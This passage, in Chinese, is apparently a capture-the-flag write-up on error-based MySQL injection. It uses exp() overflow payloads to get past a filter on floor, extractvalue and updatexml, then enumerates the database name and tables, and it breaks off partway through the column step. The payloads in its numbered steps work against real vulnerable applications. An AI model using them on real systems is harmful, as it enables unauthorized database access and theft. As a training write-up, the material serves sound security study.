题目提示是报错注入,于是就用盲注技巧来注入。
这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧)
1.爆库
' or exp(~(select * from(select database())a))#
这里最后面的a处可为别的字母,且必须要有
可以看到库名为web1。
2,爆表
' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
或者
' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='web1')a))#
flag应该在表flag中。
3.爆列名
' or exp(~(select * from(select group_concat(column_name) from information_schema.columns wh